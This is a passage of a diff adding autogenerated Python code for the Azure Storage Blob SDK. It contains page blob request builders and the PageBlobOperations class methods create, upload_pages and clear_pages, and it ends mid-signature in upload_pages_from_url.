-> HttpRequest + comp = kwargs.pop('comp', "properties") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + blob_content_length = kwargs.pop('blob_content_length') # type: int + timeout = kwargs.pop('timeout', None) # type: Optional[int] + lease_id = kwargs.pop('lease_id', None) # type: Optional[str] + encryption_key = kwargs.pop('encryption_key', None) # type: Optional[str] + encryption_key_sha256 = kwargs.pop('encryption_key_sha256', None) # type: Optional[str] + encryption_algorithm = kwargs.pop('encryption_algorithm', None) # type: Optional[Union[str, "_models.EncryptionAlgorithmType"]] + encryption_scope = kwargs.pop('encryption_scope', None) # type: Optional[str] + if_modified_since = kwargs.pop('if_modified_since', None) # type: Optional[datetime.datetime] + if_unmodified_since = kwargs.pop('if_unmodified_since', None) # type: Optional[datetime.datetime] + if_match = kwargs.pop('if_match', None) # type: Optional[str] + if_none_match = kwargs.pop('if_none_match', None) # type: Optional[str] + if_tags = kwargs.pop('if_tags', None) # type: Optional[str] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + if lease_id is not None: + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + if encryption_key is not None: + _header_parameters['x-ms-encryption-key'] = _SERIALIZER.header("encryption_key", encryption_key, 'str') + if encryption_key_sha256 is not None: + _header_parameters['x-ms-encryption-key-sha256'] = _SERIALIZER.header("encryption_key_sha256", encryption_key_sha256, 'str') + if encryption_algorithm is not None: + _header_parameters['x-ms-encryption-algorithm'] = _SERIALIZER.header("encryption_algorithm", encryption_algorithm, 'str') + if encryption_scope is not None: + _header_parameters['x-ms-encryption-scope'] = _SERIALIZER.header("encryption_scope", encryption_scope, 'str') + if if_modified_since is not None: + _header_parameters['If-Modified-Since'] = _SERIALIZER.header("if_modified_since", if_modified_since, 'rfc-1123') + if if_unmodified_since is not None: + _header_parameters['If-Unmodified-Since'] = _SERIALIZER.header("if_unmodified_since", if_unmodified_since, 'rfc-1123') + if if_match is not None: + _header_parameters['If-Match'] = _SERIALIZER.header("if_match", if_match, 'str') + if if_none_match is not None: + _header_parameters['If-None-Match'] = _SERIALIZER.header("if_none_match", if_none_match, 'str') + if if_tags is not None: + _header_parameters['x-ms-if-tags'] = _SERIALIZER.header("if_tags", if_tags, 'str') + _header_parameters['x-ms-blob-content-length'] = _SERIALIZER.header("blob_content_length", blob_content_length, 'long') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = 
_SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_update_sequence_number_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + comp = kwargs.pop('comp', "properties") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + sequence_number_action = kwargs.pop('sequence_number_action') # type: Union[str, "_models.SequenceNumberActionType"] + timeout = kwargs.pop('timeout', None) # type: Optional[int] + lease_id = kwargs.pop('lease_id', None) # type: Optional[str] + if_modified_since = kwargs.pop('if_modified_since', None) # type: Optional[datetime.datetime] + if_unmodified_since = kwargs.pop('if_unmodified_since', None) # type: Optional[datetime.datetime] + if_match = kwargs.pop('if_match', None) # type: Optional[str] + if_none_match = kwargs.pop('if_none_match', None) # type: Optional[str] + if_tags = kwargs.pop('if_tags', None) # type: Optional[str] + blob_sequence_number = kwargs.pop('blob_sequence_number', 0) # type: Optional[int] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + if lease_id is not None: + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + if if_modified_since is not None: + _header_parameters['If-Modified-Since'] = _SERIALIZER.header("if_modified_since", if_modified_since, 'rfc-1123') + if if_unmodified_since is not None: + _header_parameters['If-Unmodified-Since'] = _SERIALIZER.header("if_unmodified_since", if_unmodified_since, 'rfc-1123') + if if_match is not None: + _header_parameters['If-Match'] = _SERIALIZER.header("if_match", if_match, 'str') + if if_none_match is not None: + _header_parameters['If-None-Match'] = _SERIALIZER.header("if_none_match", if_none_match, 'str') + if if_tags is not None: + _header_parameters['x-ms-if-tags'] = _SERIALIZER.header("if_tags", if_tags, 'str') + _header_parameters['x-ms-sequence-number-action'] = _SERIALIZER.header("sequence_number_action", sequence_number_action, 'str') + if blob_sequence_number is not None: + _header_parameters['x-ms-blob-sequence-number'] = _SERIALIZER.header("blob_sequence_number", blob_sequence_number, 'long') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_copy_incremental_request( + url, # type: str + 
**kwargs # type: Any +): + # type: (...) -> HttpRequest + comp = kwargs.pop('comp', "incrementalcopy") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + copy_source = kwargs.pop('copy_source') # type: str + timeout = kwargs.pop('timeout', None) # type: Optional[int] + if_modified_since = kwargs.pop('if_modified_since', None) # type: Optional[datetime.datetime] + if_unmodified_since = kwargs.pop('if_unmodified_since', None) # type: Optional[datetime.datetime] + if_match = kwargs.pop('if_match', None) # type: Optional[str] + if_none_match = kwargs.pop('if_none_match', None) # type: Optional[str] + if_tags = kwargs.pop('if_tags', None) # type: Optional[str] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + if if_modified_since is not None: + _header_parameters['If-Modified-Since'] = _SERIALIZER.header("if_modified_since", if_modified_since, 'rfc-1123') + if if_unmodified_since is not None: + _header_parameters['If-Unmodified-Since'] = _SERIALIZER.header("if_unmodified_since", if_unmodified_since, 'rfc-1123') + if if_match is not None: + _header_parameters['If-Match'] = _SERIALIZER.header("if_match", if_match, 'str') + if if_none_match is not None: + _header_parameters['If-None-Match'] = _SERIALIZER.header("if_none_match", if_none_match, 'str') + if if_tags is not None: + _header_parameters['x-ms-if-tags'] = _SERIALIZER.header("if_tags", if_tags, 'str') + _header_parameters['x-ms-copy-source'] = _SERIALIZER.header("copy_source", copy_source, 'str') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + +# fmt: on +class PageBlobOperations(object): + """ + .. warning:: + **DO NOT** instantiate this class directly. + + Instead, you should access the following operations through + :class:`~azure.storage.blob.AzureBlobStorage`'s + :attr:`page_blob` attribute. 
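Each build_*_request helper above only assembles an azure.core.rest.HttpRequest from its defaults and keyword overrides; no network I/O happens until the request is run through the client pipeline. A minimal sketch of what build_create_request returns, assuming this vendored module is importable (the URL below is a hypothetical placeholder):

# Hedged sketch: the builder constructs a request object; it sends nothing.
request = build_create_request(
    url="https://example.blob.core.windows.net",
    content_length=0,
    blob_content_length=512,  # page blob size must be 512-byte aligned
)
print(request.method)                     # "PUT"
print(request.headers["x-ms-blob-type"])  # "PageBlob"
print(request.headers["x-ms-version"])    # "2021-04-10" (default)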
+ """ + + models = _models + + def __init__(self, *args, **kwargs): + args = list(args) + self._client = args.pop(0) if args else kwargs.pop("client") + self._config = args.pop(0) if args else kwargs.pop("config") + self._serialize = args.pop(0) if args else kwargs.pop("serializer") + self._deserialize = args.pop(0) if args else kwargs.pop("deserializer") + + + @distributed_trace + def create( # pylint: disable=inconsistent-return-statements + self, + content_length, # type: int + blob_content_length, # type: int + timeout=None, # type: Optional[int] + tier=None, # type: Optional[Union[str, "_models.PremiumPageBlobAccessTier"]] + metadata=None, # type: Optional[Dict[str, str]] + blob_sequence_number=0, # type: Optional[int] + request_id_parameter=None, # type: Optional[str] + blob_tags_string=None, # type: Optional[str] + immutability_policy_expiry=None, # type: Optional[datetime.datetime] + immutability_policy_mode=None, # type: Optional[Union[str, "_models.BlobImmutabilityPolicyMode"]] + legal_hold=None, # type: Optional[bool] + blob_http_headers=None, # type: Optional["_models.BlobHTTPHeaders"] + lease_access_conditions=None, # type: Optional["_models.LeaseAccessConditions"] + cpk_info=None, # type: Optional["_models.CpkInfo"] + cpk_scope_info=None, # type: Optional["_models.CpkScopeInfo"] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> None + """The Create operation creates a new page blob. + + :param content_length: The length of the request. + :type content_length: long + :param blob_content_length: This header specifies the maximum size for the page blob, up to 1 + TB. The page blob size must be aligned to a 512-byte boundary. + :type blob_content_length: long + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param tier: Optional. Indicates the tier to be set on the page blob. Default value is None. + :type tier: str or ~azure.storage.blob.models.PremiumPageBlobAccessTier + :param metadata: Optional. Specifies a user-defined name-value pair associated with the blob. + If no name-value pairs are specified, the operation will copy the metadata from the source blob + or file to the destination blob. If one or more name-value pairs are specified, the destination + blob is created with the specified metadata, and metadata is not copied from the source blob or + file. Note that beginning with version 2009-09-19, metadata names must adhere to the naming + rules for C# identifiers. See Naming and Referencing Containers, Blobs, and Metadata for more + information. Default value is None. + :type metadata: dict[str, str] + :param blob_sequence_number: Set for page blobs only. The sequence number is a user-controlled + value that you can use to track requests. The value of the sequence number must be between 0 + and 2^63 - 1. Default value is 0. + :type blob_sequence_number: long + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param blob_tags_string: Optional. Used to set blob tags in various blob operations. Default + value is None. 
+ :type blob_tags_string: str + :param immutability_policy_expiry: Specifies the date time when the blobs immutability policy + is set to expire. Default value is None. + :type immutability_policy_expiry: ~datetime.datetime + :param immutability_policy_mode: Specifies the immutability policy mode to set on the blob. + Default value is None. + :type immutability_policy_mode: str or ~azure.storage.blob.models.BlobImmutabilityPolicyMode + :param legal_hold: Specified if a legal hold should be set on the blob. Default value is None. + :type legal_hold: bool + :param blob_http_headers: Parameter group. Default value is None. + :type blob_http_headers: ~azure.storage.blob.models.BlobHTTPHeaders + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param cpk_info: Parameter group. Default value is None. + :type cpk_info: ~azure.storage.blob.models.CpkInfo + :param cpk_scope_info: Parameter group. Default value is None. + :type cpk_scope_info: ~azure.storage.blob.models.CpkScopeInfo + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword blob_type: Specifies the type of blob to create: block blob, page blob, or append + blob. Default value is "PageBlob". Note that overriding this default value may result in + unsupported behavior. + :paramtype blob_type: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + blob_type = kwargs.pop('blob_type', "PageBlob") # type: str + + _blob_content_type = None + _blob_content_encoding = None + _blob_content_language = None + _blob_content_md5 = None + _blob_cache_control = None + _lease_id = None + _blob_content_disposition = None + _encryption_key = None + _encryption_key_sha256 = None + _encryption_algorithm = None + _encryption_scope = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if blob_http_headers is not None: + _blob_content_type = blob_http_headers.blob_content_type + _blob_content_encoding = blob_http_headers.blob_content_encoding + _blob_content_language = blob_http_headers.blob_content_language + _blob_content_md5 = blob_http_headers.blob_content_md5 + _blob_cache_control = blob_http_headers.blob_cache_control + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if blob_http_headers is not None: + _blob_content_disposition = blob_http_headers.blob_content_disposition + if cpk_info is not None: + _encryption_key = cpk_info.encryption_key + _encryption_key_sha256 = cpk_info.encryption_key_sha256 + _encryption_algorithm = cpk_info.encryption_algorithm + if cpk_scope_info is not None: + _encryption_scope = cpk_scope_info.encryption_scope + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = 
modified_access_conditions.if_tags + + request = build_create_request( + url=self._config.url, + blob_type=blob_type, + version=self._config.version, + content_length=content_length, + blob_content_length=blob_content_length, + timeout=timeout, + tier=tier, + blob_content_type=_blob_content_type, + blob_content_encoding=_blob_content_encoding, + blob_content_language=_blob_content_language, + blob_content_md5=_blob_content_md5, + blob_cache_control=_blob_cache_control, + metadata=metadata, + lease_id=_lease_id, + blob_content_disposition=_blob_content_disposition, + encryption_key=_encryption_key, + encryption_key_sha256=_encryption_key_sha256, + encryption_algorithm=_encryption_algorithm, + encryption_scope=_encryption_scope, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + blob_sequence_number=blob_sequence_number, + request_id_parameter=request_id_parameter, + blob_tags_string=blob_tags_string, + immutability_policy_expiry=immutability_policy_expiry, + immutability_policy_mode=immutability_policy_mode, + legal_hold=legal_hold, + template_url=self.create.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [201]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['Content-MD5']=self._deserialize('bytearray', response.headers.get('Content-MD5')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['x-ms-version-id']=self._deserialize('str', response.headers.get('x-ms-version-id')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-request-server-encrypted']=self._deserialize('bool', response.headers.get('x-ms-request-server-encrypted')) + response_headers['x-ms-encryption-key-sha256']=self._deserialize('str', response.headers.get('x-ms-encryption-key-sha256')) + response_headers['x-ms-encryption-scope']=self._deserialize('str', response.headers.get('x-ms-encryption-scope')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + create.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace + def upload_pages( # pylint: disable=inconsistent-return-statements + self, + content_length, # type: int + body, # type: IO + transactional_content_md5=None, # type: Optional[bytearray] + transactional_content_crc64=None, # type: Optional[bytearray] + timeout=None, # type: Optional[int] + range=None, # type: Optional[str] + request_id_parameter=None, # type: Optional[str] + lease_access_conditions=None, # type: 
Optional["_models.LeaseAccessConditions"] + cpk_info=None, # type: Optional["_models.CpkInfo"] + cpk_scope_info=None, # type: Optional["_models.CpkScopeInfo"] + sequence_number_access_conditions=None, # type: Optional["_models.SequenceNumberAccessConditions"] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> None + """The Upload Pages operation writes a range of pages to a page blob. + + :param content_length: The length of the request. + :type content_length: long + :param body: Initial data. + :type body: IO + :param transactional_content_md5: Specify the transactional md5 for the body, to be validated + by the service. Default value is None. + :type transactional_content_md5: bytearray + :param transactional_content_crc64: Specify the transactional crc64 for the body, to be + validated by the service. Default value is None. + :type transactional_content_crc64: bytearray + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param range: Return only the bytes of the blob in the specified range. Default value is None. + :type range: str + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param cpk_info: Parameter group. Default value is None. + :type cpk_info: ~azure.storage.blob.models.CpkInfo + :param cpk_scope_info: Parameter group. Default value is None. + :type cpk_scope_info: ~azure.storage.blob.models.CpkScopeInfo + :param sequence_number_access_conditions: Parameter group. Default value is None. + :type sequence_number_access_conditions: + ~azure.storage.blob.models.SequenceNumberAccessConditions + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "page". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword page_write: Required. You may specify one of the following options: + + + * Update: Writes the bytes specified by the request body into the specified range. The Range + and Content-Length headers must match to perform the update. + * Clear: Clears the specified range and releases the space used in storage for that range. To + clear a range, set the Content-Length header to zero, and the Range header to a value that + indicates the range to clear, up to maximum blob size. Default value is "update". Note that + overriding this default value may result in unsupported behavior. 
+ :paramtype page_write: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "page") # type: str + page_write = kwargs.pop('page_write', "update") # type: str + content_type = kwargs.pop('content_type', "application/octet-stream") # type: Optional[str] + + _lease_id = None + _encryption_key = None + _encryption_key_sha256 = None + _encryption_algorithm = None + _encryption_scope = None + _if_sequence_number_less_than_or_equal_to = None + _if_sequence_number_less_than = None + _if_sequence_number_equal_to = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if cpk_info is not None: + _encryption_key = cpk_info.encryption_key + _encryption_key_sha256 = cpk_info.encryption_key_sha256 + _encryption_algorithm = cpk_info.encryption_algorithm + if cpk_scope_info is not None: + _encryption_scope = cpk_scope_info.encryption_scope + if sequence_number_access_conditions is not None: + _if_sequence_number_less_than_or_equal_to = sequence_number_access_conditions.if_sequence_number_less_than_or_equal_to + _if_sequence_number_less_than = sequence_number_access_conditions.if_sequence_number_less_than + _if_sequence_number_equal_to = sequence_number_access_conditions.if_sequence_number_equal_to + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + _content = body + + request = build_upload_pages_request( + url=self._config.url, + comp=comp, + page_write=page_write, + version=self._config.version, + content_type=content_type, + content=_content, + content_length=content_length, + transactional_content_md5=transactional_content_md5, + transactional_content_crc64=transactional_content_crc64, + timeout=timeout, + range=range, + lease_id=_lease_id, + encryption_key=_encryption_key, + encryption_key_sha256=_encryption_key_sha256, + encryption_algorithm=_encryption_algorithm, + encryption_scope=_encryption_scope, + if_sequence_number_less_than_or_equal_to=_if_sequence_number_less_than_or_equal_to, + if_sequence_number_less_than=_if_sequence_number_less_than, + if_sequence_number_equal_to=_if_sequence_number_equal_to, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + template_url=self.upload_pages.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [201]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = 
self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['Content-MD5']=self._deserialize('bytearray', response.headers.get('Content-MD5')) + response_headers['x-ms-content-crc64']=self._deserialize('bytearray', response.headers.get('x-ms-content-crc64')) + response_headers['x-ms-blob-sequence-number']=self._deserialize('long', response.headers.get('x-ms-blob-sequence-number')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-request-server-encrypted']=self._deserialize('bool', response.headers.get('x-ms-request-server-encrypted')) + response_headers['x-ms-encryption-key-sha256']=self._deserialize('str', response.headers.get('x-ms-encryption-key-sha256')) + response_headers['x-ms-encryption-scope']=self._deserialize('str', response.headers.get('x-ms-encryption-scope')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + upload_pages.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace + def clear_pages( # pylint: disable=inconsistent-return-statements + self, + content_length, # type: int + timeout=None, # type: Optional[int] + range=None, # type: Optional[str] + request_id_parameter=None, # type: Optional[str] + lease_access_conditions=None, # type: Optional["_models.LeaseAccessConditions"] + cpk_info=None, # type: Optional["_models.CpkInfo"] + cpk_scope_info=None, # type: Optional["_models.CpkScopeInfo"] + sequence_number_access_conditions=None, # type: Optional["_models.SequenceNumberAccessConditions"] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> None + """The Clear Pages operation clears a set of pages from a page blob. + + :param content_length: The length of the request. + :type content_length: long + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param range: Return only the bytes of the blob in the specified range. Default value is None. + :type range: str + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param cpk_info: Parameter group. Default value is None. + :type cpk_info: ~azure.storage.blob.models.CpkInfo + :param cpk_scope_info: Parameter group. Default value is None. + :type cpk_scope_info: ~azure.storage.blob.models.CpkScopeInfo + :param sequence_number_access_conditions: Parameter group. Default value is None. 
+ :type sequence_number_access_conditions: + ~azure.storage.blob.models.SequenceNumberAccessConditions + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "page". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword page_write: Required. You may specify one of the following options: + + + * Update: Writes the bytes specified by the request body into the specified range. The Range + and Content-Length headers must match to perform the update. + * Clear: Clears the specified range and releases the space used in storage for that range. To + clear a range, set the Content-Length header to zero, and the Range header to a value that + indicates the range to clear, up to maximum blob size. Default value is "clear". Note that + overriding this default value may result in unsupported behavior. + :paramtype page_write: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "page") # type: str + page_write = kwargs.pop('page_write', "clear") # type: str + + _lease_id = None + _encryption_key = None + _encryption_key_sha256 = None + _encryption_algorithm = None + _encryption_scope = None + _if_sequence_number_less_than_or_equal_to = None + _if_sequence_number_less_than = None + _if_sequence_number_equal_to = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if cpk_info is not None: + _encryption_key = cpk_info.encryption_key + _encryption_key_sha256 = cpk_info.encryption_key_sha256 + _encryption_algorithm = cpk_info.encryption_algorithm + if cpk_scope_info is not None: + _encryption_scope = cpk_scope_info.encryption_scope + if sequence_number_access_conditions is not None: + _if_sequence_number_less_than_or_equal_to = sequence_number_access_conditions.if_sequence_number_less_than_or_equal_to + _if_sequence_number_less_than = sequence_number_access_conditions.if_sequence_number_less_than + _if_sequence_number_equal_to = sequence_number_access_conditions.if_sequence_number_equal_to + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + + request = build_clear_pages_request( + url=self._config.url, + comp=comp, + page_write=page_write, + version=self._config.version, + content_length=content_length, + timeout=timeout, + range=range, + lease_id=_lease_id, + encryption_key=_encryption_key, + encryption_key_sha256=_encryption_key_sha256, + encryption_algorithm=_encryption_algorithm, + encryption_scope=_encryption_scope, + if_sequence_number_less_than_or_equal_to=_if_sequence_number_less_than_or_equal_to, + 
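+ # These sequence-number and if_* arguments are serialized by the request
+ # builder as conditional headers (x-ms-if-sequence-number-le/-lt/-eq,
+ # If-Modified-Since, If-Match, x-ms-if-tags, ...), so the clear is applied
+ # only when the blob's current state satisfies them.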
if_sequence_number_less_than=_if_sequence_number_less_than, + if_sequence_number_equal_to=_if_sequence_number_equal_to, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + template_url=self.clear_pages.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [201]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['Content-MD5']=self._deserialize('bytearray', response.headers.get('Content-MD5')) + response_headers['x-ms-content-crc64']=self._deserialize('bytearray', response.headers.get('x-ms-content-crc64')) + response_headers['x-ms-blob-sequence-number']=self._deserialize('long', response.headers.get('x-ms-blob-sequence-number')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + clear_pages.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace + def upload_pages_from_url( # pylint: disable=inconsistent-return-statements + self, + source_url, # type: str + source_range, # type: str + content_length, # type: int + range, # type: str + source_content_md5=None, # type: Optional[bytearray] + source_contentcrc64=None, # type: Optional[bytearray] + timeout=None, # type: Optional[int] + request_id_parameter=None, # type: Optional[str] + copy_source_authorization=None, # type: Optional[str] + cpk_info=None, # type: Optional["_models.CpkInfo"] + cpk_scope_info=None, # type: 